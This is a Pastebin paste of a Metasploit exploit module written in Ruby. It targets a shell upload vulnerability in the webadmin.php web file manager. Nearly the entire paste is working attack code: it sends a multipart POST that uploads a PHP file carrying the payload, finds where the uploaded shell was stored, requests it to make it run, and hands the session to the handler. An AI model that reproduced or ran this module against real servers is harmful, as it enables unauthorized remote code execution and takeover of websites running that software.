Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = GreatRanking
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'webadmin <= Shell Upload Vulnerability',
- 'Description' => %q{
- This module exploits an arbitrary shell upload vulnerability in
- the webadmin.php
- },
- 'Author' => [ 'Caddy-Dz' ],
- 'License' => MSF_LICENSE,
- 'References' => ["http://wacker-welt.de/webadmin/webadmin.php.gz" ],
- 'Privileged' => false,
- 'Payload' =>
- {
- 'DisableNops' => true,
- },
- 'Platform' => 'php',
- 'Arch' => ARCH_PHP,
- 'Targets' => [[ 'Automatic', { }]],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Sept 13, 2011'
- ))
- register_options([
- OptString.new('URI', [true, "Path to webadmin ", "/"]),
- ], self.class)
- end
- def exploit
- boundary = rand_text_alphanumeric(6)
- fn = rand_text_alphanumeric(8)
- data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
- data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n"
- data << payload.encoded
- data << "\r\n--#{boundary}--"
- res = send_request_raw({
- 'uri' => datastore['URI'] + "/webadmin.php",
- 'method' => 'POST',
- 'data' => data,
- 'headers' =>
- {
- 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
- 'Content-Length' => data.length,
- }
- }, 25)
- if (res)
- print_status("Successfully uploaded shell.")
- shell_path = res.body.split("_")[0]
- print_status("Trying to access shell at #{shell_path}...")
- res = send_request_raw({
- 'uri' => datastore['URI'] + shell_path,
- 'method' => 'GET',
- }, 0.01)
- else
- print_error("Error uploading shell")
- end
- handler
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement